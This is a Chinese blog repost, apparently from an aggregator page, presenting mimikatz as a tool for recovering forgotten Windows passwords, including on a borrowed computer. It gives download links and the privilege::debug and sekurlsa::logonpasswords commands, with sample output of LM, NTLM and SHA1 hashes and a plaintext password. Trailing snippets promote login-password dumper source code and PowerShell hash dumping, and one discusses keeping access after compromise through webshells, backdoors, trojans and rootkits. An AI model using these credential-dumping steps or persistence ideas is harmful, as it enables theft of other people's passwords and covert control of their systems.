【转】获取Windows系统明文密码神器

前序

电脑密码忘记了可以用本工具找回,前提是你能进入系统,例如本机保存了远程服务器登录的密码或借别人的电脑,而忘记了密码;mimikatz 2.0工具正好解决了你的问题。

工具下载

binaires : https://github.com/gentilkiwi/mimikatz/releases/latest
baiduyun : http://pan.baidu.com/s/1i38m7Fv

以管理员权限运行mimikatz.exe (x86 or x64)

mimikatz # privilege::debug            //手动输入privilege::debug
 Privilege ‘20‘ OK
mimikatz # sekurlsa::logonpasswords    //手动输入sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
 Session          : Interactive from 2
 User Name        : administrator      //这个是管理员的账户
 Domain           : vm-w7-ult-x
 SID              : S-1-5-21-1982681256-1210654043-1600862990-1000
     msv  :
       [00000003] Primary
       * Username : win-201509101320
         * Domain : vm-w7-ult-x
             * LM : d0e9aee149655a6075e4540af1f22d3b
           * NTLM : cc36cf7a8514893efccd332446158b1a
           * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
    tspkg :
       * Username : win-201509101320   //这个是主机名称
         * Domain : vm-w7-ult-x
       * Password : 666666            //这个是电脑密码

原文链接:https://lirongyao.com/get-windows-system-plaintext-password-artifact.html

时间: 2024-10-13 23:50:18

【转】获取Windows系统明文密码神器的相关文章

[源码]一键获取windows系统登陆密码vc6版源码

[源码]一键获取windows系统登陆密码vc6版源码支持:XP/2000/2003/WIN7/2008等 此版本编译出来的程序体积较小几十KB... 而vs版则1点几M,体积整整大了2-30倍对某些奇葩环境...1点几M可能要分几十次传过去 总是在关键的时候,发现自己以前弄过的东西突然不见了然后百度好不容易找到了一份..还是发到博客来 收藏需要修改输出TXT的或免杀啥的...上自己博客找源码 #include <windows.h>#include <stdio.h> // //

通过PowerShell获取Windows系统密码Hash

当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大的收获.用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种木马还是Rootkit?webshell,哪怕是一句话木马都很容易被管理员清除,放了木马,也容易被有经验的管理员查出,不管是早期自己创建进程,进程被干掉就完了,还是注入进程的木马,或者是以服务自启动的木马

SWT获取windows系统窗口颜色

很多人在使用电脑时都会将系统窗口的颜色修改为护眼色(85.95.205),在设计软件的界面背景时就需要考虑到背景颜色是根据系统的窗口颜色来决定的. 在使用AWT时,可以通过java.awt.SystemColor.window来获取windows系统窗口颜色.使用SWT时,如果使用Display.getSystemColor(id)是无法获得系统窗口颜色的.不过通过Display的getSystemColor方法可以启发我们自己写一个获取系统窗口颜色的方法,以下为代码: int pixel = 

这段百度问答,对我相关有对啊!!!----如何获取Windows系统登陆用户名

如何获取Windows系统登陆用户名 http://zhidao.baidu.com/link?url=Hva9PkVwYZv8KSEWftSqTWe8fqM1dhoq59BurnfADmcOvFjFgJUONb2kQ4KrJUF5KjOTXjCf5SQKYNLhcU_dBMzGGBxFxJCRfxCmamIjUji ======================= 一般用 GetUserName(或 GetUserNameEx )函数可得到当前登陆登陆用户名(但不总会得到,下面会分析),此系统函

获取Windows系统特殊性目录路径

获取Windows系统特殊性目录路径 uses ShlObj 获取方法: function GetPath(FID: Integer): string;var  pidl: PItemIDList;  path: array[0..MAX_PATH] of Char;begin  SHGetSpecialFolderLocation(0, FID, pidl);  SHGetPathFromIDList(pidl, path);  Result := path;end; 参数可以为下面这些: 1

Windows系统忘记密码怎么办?如何破解密码?(亲测可用)

国外有一个工具:LazesoftRecoverMyPassword软件,可用于系统密码破解与清除工具,它可以轻松移除 Windows 系统的登录密码,快速破解与清除电脑开机密码,也可以重置密码或者设置为空密码,解锁被锁定或禁用的用户帐户.其原理就是通过创建一个启动盘来破解Windows开机密码. 所需软件: (1)LazesoftRecoverMyPassword软件 (2)UltraISO软件 具体步骤如下: 1.下载并安装LazesoftRecoverMyPassword软件: 2.生成镜像

[笔记]使用API函数 GetACP 获取Windows系统当前代码页

代码页是字符集编码的别名,也称"内码表",是特定语言的字符集的一张表.代码页分为两种:一种是ANSI代码页:另一种是OEM代码页. ⑴OEM代码页主要是用于Windows系统中的命令行界面(Console)程序,虚拟Dos. ⑵ANSI代码页主要是用于Windows系统中本地编码不是Unicode的图形用户界面(Gui)程序. procedure TForm9.BitBtn3Click(Sender: TObject); var cpInfoEx:TcpInfoEx; begin //

windows客户端开发--获取windows系统中文件的MIME

首先,什么是MIME,是不是文件的后缀名呢? 当然不是. 有时候我们需要获取某个文件的后缀名,这也许对你来说太小case了,你可能不加思考的写了一个函数,更加文件名字符串查找最后一个'.',然后取最有一个'.'之后的字符串,即为我们要得到的后缀名. 看似非常完美,但确实漏洞百出. 如果我的文件没有后缀名怎么办? 如果我的一张png图片,我强制把后缀名改为jpg怎么办? 这样你根据文件名字方法就不能获得百分百正确的后缀名. 所以,就该MIME出场了! 何为MIME? MIME (Multipurp

快速获取Windows系统上的国家和地区信息

Windows系统上包含了200多个国家和地区的数据,有时候编程需要这些资料.以下代码可以帮助你快速获取这些信息.将Console语句注释掉,可以更快的完成分析. 1 static void Main(string[] args) { 2 Console.WriteLine("Start!"); 3 // 这里可以修改文件路径和文件名称. 4 var sw = new StreamWriter(new FileStream("RegionInfo.txt", Fil